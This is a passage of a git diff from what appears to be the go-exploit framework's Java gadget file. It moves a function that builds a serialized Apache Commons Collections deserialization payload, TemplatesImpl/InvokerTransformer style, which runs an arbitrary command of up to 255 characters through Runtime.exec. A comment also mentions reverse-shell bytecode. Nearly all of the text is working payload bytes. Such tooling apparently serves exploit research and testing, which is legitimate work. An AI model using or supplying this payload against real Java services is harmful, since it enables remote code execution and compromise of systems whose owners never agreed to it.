ErrorInvalidCommandLength("command cannot be longer than 255 characters") - } - - if len(commandStr) <= 0 { - return []byte{}, ErrorInvalidCommandLength("command must be greater than 0 characters") - } - - payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61"+ - "\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65"+ - "\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00"+ - "\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00"+ - "\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e"+ - "\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+ - "\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+ - "\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e"+ - "\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79"+ - "\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c"+ - "\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76"+ - "\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+ - "\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c"+ - "\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61"+ - "\x70\x3b\x78\x70\x73\x72\x00\x3a\x63\x6f\x6d\x2e"+ - "\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63"+ - 
"\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74"+ - "\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e"+ - "\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74"+ - "\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac"+ - "\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64"+ - "\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e"+ - "\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64"+ - "\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f"+ - "\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06"+ - "\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a"+ - "\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61"+ - "\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74"+ - "\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67"+ - "\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f"+ - "\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72"+ - "\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61"+ - "\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72"+ - "\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff"+ - "\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd"+ - "\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00"+ - "\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17"+ - "\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00"+ - "\x07\x93\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x39"+ - "\x0a\x00\x03\x00\x22\x07\x00\x37\x07\x00\x25\x07"+ - "\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56"+ - "\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01"+ - "\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74"+ - "\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd"+ - "\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01"+ - "\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65"+ - "\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65"+ - "\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63"+ - "\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61"+ - "\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00"+ - "\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65"+ - "\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49"+ - "\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01"+ - 
"\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+ - "\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+ - "\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53"+ - "\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50"+ - "\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72"+ - "\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c"+ - "\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f"+ - "\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e"+ - "\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73"+ - "\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f"+ - "\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+ - "\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+ - "\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+ - "\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+ - "\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+ - "\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63\x75\x6d"+ - "\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73"+ - "\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+ - "\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65"+ - "\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x44"+ - "\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65"+ - "\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73"+ - "\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+ - "\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+ - "\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65"+ - "\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74"+ - "\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01"+ - "\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73"+ - "\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f"+ - "\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+ - "\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+ - "\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+ - "\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e"+ - "\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f"+ - "\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c"+ - "\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73"+ - "\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f"+ - 
"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70"+ - "\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74"+ - "\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c"+ - "\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69"+ - "\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65"+ - "\x72\x3b\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61"+ - "\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d\x2f\x73"+ - "\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68"+ - "\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e"+ - "\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78"+ - "\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x01"+ - "\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41"+ - "\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67"+ - "\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f"+ - "\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72"+ - "\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69"+ - "\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e"+ - "\x64\x6c\x65\x72\x3b\x01\x00\x0a\x53\x6f\x75\x72"+ - "\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64"+ - "\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a"+ - "\x00\x0b\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73"+ - "\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+ - "\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+ - "\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e"+ - "\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01"+ - "\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72"+ - "\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c"+ - "\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f"+ - "\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d"+ - "\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72"+ - "\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a\x61\x76"+ - "\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69"+ - "\x7a\x61\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f"+ - "\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63"+ - "\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74"+ - "\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f"+ - "\x54\x72\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65"+ - 
"\x70\x74\x69\x6f\x6e\x01\x00\x1f\x79\x73\x6f\x73"+ - "\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61"+ - "\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67"+ - "\x65\x74\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69"+ - "\x74\x3e\x01\x00\x11\x6a\x61\x76\x61\x2f\x6c\x61"+ - "\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00"+ - "\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69"+ - "\x6d\x65\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61"+ - "\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d"+ - "\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b\x00\x2e"+ - - // 255 characters were allocated, we just put back the unused - // length as spaces - "\x01\x00\xff" + commandStr + strings.Repeat(" ", 0xff-len(commandStr)) + - - "\x08\x00\x30\x01\x00\x04"+ - "\x65\x78\x65\x63\x01\x00\x27\x28\x4c\x6a\x61\x76"+ - "\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e"+ - "\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e"+ - "\x67\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00"+ - "\x32\x00\x33\x0a\x00\x2b\x00\x34\x01\x00\x0d\x53"+ - "\x74\x61\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65"+ - "\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+ - "\x2f\x50\x77\x6e\x65\x72\x37\x34\x30\x30\x32\x30"+ - "\x33\x39\x32\x34\x35\x37\x39\x31\x01\x00\x1f\x4c"+ - "\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x50\x77"+ - "\x6e\x65\x72\x37\x34\x30\x30\x32\x30\x33\x39\x32"+ - "\x34\x35\x37\x39\x31\x3b\x00\x21\x00\x02\x00\x03"+ - "\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06"+ - "\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x04"+ - "\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00"+ - "\x00\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7"+ - "\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+ - "\x06\x00\x01\x00\x00\x00\x2f\x00\x0e\x00\x00\x00"+ - "\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00"+ - "\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00"+ - "\x00\x00\x3f\x00\x00\x00\x03\x00\x00\x00\x01\xb1"+ - "\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01"+ - "\x00\x00\x00\x33\x00\x0e\x00\x00\x00\x20\x00\x03"+ - 
"\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00"+ - "\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01"+ - "\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\x00\x04"+ - "\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02"+ - "\x00\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00"+ - "\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00"+ - "\x06\x00\x01\x00\x00\x00\x36\x00\x0e\x00\x00\x00"+ - "\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00"+ - "\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00"+ - "\x00\x00\x01\x00\x1c\x00\x1d\x00\x02\x00\x00\x00"+ - "\x01\x00\x1e\x00\x1f\x00\x03\x00\x19\x00\x00\x00"+ - "\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00"+ - "\x01\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00"+ - "\x00\x00\x0f\xa7\x00\x03\x01\x4c\xb8\x00\x2f\x12"+ - "\x31\xb6\x00\x35\x57\xb1\x00\x00\x00\x01\x00\x36"+ - "\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00"+ - "\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00"+ - "\x01\x00\x02\x00\x23\x00\x10\x00\x09\x75\x71\x00"+ - "\x7e\x00\x0e\x00\x00\x01\xd4\xca\xfe\xba\xbe\x00"+ - "\x00\x00\x32\x00\x1b\x0a\x00\x03\x00\x15\x07\x00"+ - "\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65"+ - "\x72\x69\x61\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55"+ - "\x49\x44\x01\x00\x01\x4a\x01\x00\x0d\x43\x6f\x6e"+ - "\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71"+ - "\xe6\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69"+ - "\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00"+ - "\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c\x69\x6e\x65"+ - "\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01"+ - "\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61"+ - "\x62\x6c\x65\x54\x61\x62\x6c\x65\x01\x00\x04\x74"+ - "\x68\x69\x73\x01\x00\x03\x46\x6f\x6f\x01\x00\x0c"+ - "\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73"+ - "\x01\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61"+ - "\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75"+ - "\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24"+ - "\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63"+ - "\x65\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67"+ - 
"\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00"+ - "\x0b\x07\x00\x1a\x01\x00\x23\x79\x73\x6f\x73\x65"+ - "\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64"+ - "\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65"+ - "\x74\x73\x24\x46\x6f\x6f\x01\x00\x10\x6a\x61\x76"+ - "\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63"+ - "\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f"+ - "\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65"+ - "\x01\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c"+ - "\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74"+ - "\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21"+ - "\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a"+ - "\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02"+ - "\x00\x08\x00\x01\x00\x01\x00\x0a\x00\x0b\x00\x01"+ - "\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00"+ - "\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00"+ - "\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x3a\x00"+ - "\x0e\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00"+ - "\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00"+ - "\x02\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00"+ - "\x02\x00\x16\x00\x10\x00\x09\x70\x74\x00\x04\x50"+ - "\x77\x6e\x72\x70\x77\x01\x00\x78\x73\x72\x00\x2a"+ - "\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63"+ - "\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65"+ - "\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c"+ - "\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79"+ - "\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74"+ - "\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61"+ - "\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e"+ - "\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e"+ - "\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65"+ - "\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e"+ - "\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f"+ - "\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f"+ - "\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e"+ - "\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73"+ - "\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c"+ - 
"\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67"+ - "\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c"+ - "\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c"+ - "\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d"+ - "\x65\x71\x00\x7e\x00\x09\x5b\x00\x0b\x69\x50\x61"+ - "\x72\x61\x6d\x54\x79\x70\x65\x73\x71\x00\x7e\x00"+ - "\x08\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76"+ - "\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63"+ - "\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00"+ - "\x00\x78\x70\x00\x00\x00\x00\x74\x00\x0e\x6e\x65"+ - "\x77\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72"+ - "\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c"+ - "\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16"+ - "\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00"+ - "\x00\x00\x00\x73\x72\x00\x11\x6a\x61\x76\x61\x2e"+ - "\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70"+ - "\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46"+ - "\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72"+ - "\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64"+ - "\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08"+ - "\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78" - - return []byte(payloadBytes), nil -} - // This is the Java bytecode for a reverse shell. You can find the source code here: // // https://gist.github.com/j-baines/38eb6d16eed64986a369f7f981f57508 diff --git a/java/javagadget.go b/java/javagadget.go index 8260daa..ccb5796 100644 --- a/java/javagadget.go +++ b/java/javagadget.go 
@@ -1,12 +1,291 @@ package java import ( + "errors" + "fmt" "strconv" "strings" "github.com/vulncheck-oss/go-exploit/transform" ) +var errInvalidCommandLength = errors.New("invalid command length") + +func ErrorInvalidCommandLength(msg string) error { + return fmt.Errorf("%w: %s", errInvalidCommandLength, msg) +} + +// the allocated space (255). +func Commons11CommandBytecode(commandStr string) ([]byte, error) { + if len(commandStr) > 255 || len(commandStr) < 1 { + return []byte{}, ErrorInvalidCommandLength("command must be between 1 and 255 characters") + } + + payloadBytes := "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61" + + "\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x53\x65" + + "\x74\xba\x44\x85\x95\x96\xb8\xb7\x34\x03\x00\x00" + + "\x78\x70\x77\x0c\x00\x00\x00\x02\x3f\x40\x00\x00" + + "\x00\x00\x00\x01\x73\x72\x00\x34\x6f\x72\x67\x2e" + + "\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f" + + "\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f" + + "\x6e\x73\x2e\x6b\x65\x79\x76\x61\x6c\x75\x65\x2e" + + "\x54\x69\x65\x64\x4d\x61\x70\x45\x6e\x74\x72\x79" + + "\x8a\xad\xd2\x9b\x39\xc1\x1f\xdb\x02\x00\x02\x4c" + + "\x00\x03\x6b\x65\x79\x74\x00\x12\x4c\x6a\x61\x76" + + "\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" + + "\x74\x3b\x4c\x00\x03\x6d\x61\x70\x74\x00\x0f\x4c" + + "\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61" + + "\x70\x3b\x78\x70\x73\x72\x00\x3a\x63\x6f\x6d\x2e" + + "\x73\x75\x6e\x2e\x6f\x72\x67\x2e\x61\x70\x61\x63" + + "\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69\x6e\x74" + + "\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e" + + "\x74\x72\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74" + + "\x65\x73\x49\x6d\x70\x6c\x09\x57\x4f\xc1\x6e\xac" + + "\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69\x6e\x64" + + "\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e" + + "\x5f\x74\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64" + + "\x65\x78\x5b\x00\x0a\x5f\x62\x79\x74\x65\x63\x6f" + + "\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b\x00\x06" + + 
"\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a" + + "\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61" + + "\x73\x73\x3b\x4c\x00\x05\x5f\x6e\x61\x6d\x65\x74" + + "\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" + + "\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x11\x5f" + + "\x6f\x75\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72" + + "\x74\x69\x65\x73\x74\x00\x16\x4c\x6a\x61\x76\x61" + + "\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70\x65\x72" + + "\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff" + + "\xff\xff\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd" + + "\x19\x15\x67\x67\xdb\x37\x02\x00\x00\x78\x70\x00" + + "\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac\xf3\x17" + + "\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00" + + "\x07\x93\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x39" + + "\x0a\x00\x03\x00\x22\x07\x00\x37\x07\x00\x25\x07" + + "\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56" + + "\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01" + + "\x4a\x01\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74" + + "\x56\x61\x6c\x75\x65\x05\xad\x20\x93\xf3\x91\xdd" + + "\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01" + + "\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65" + + "\x01\x00\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65" + + "\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c\x6f\x63" + + "\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61" + + "\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00" + + "\x13\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65" + + "\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x0c\x49" + + "\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01" + + "\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c" + + "\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74" + + "\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x53" + + "\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50" + + "\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72" + + "\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c" + + "\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f" + + "\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e" + + 
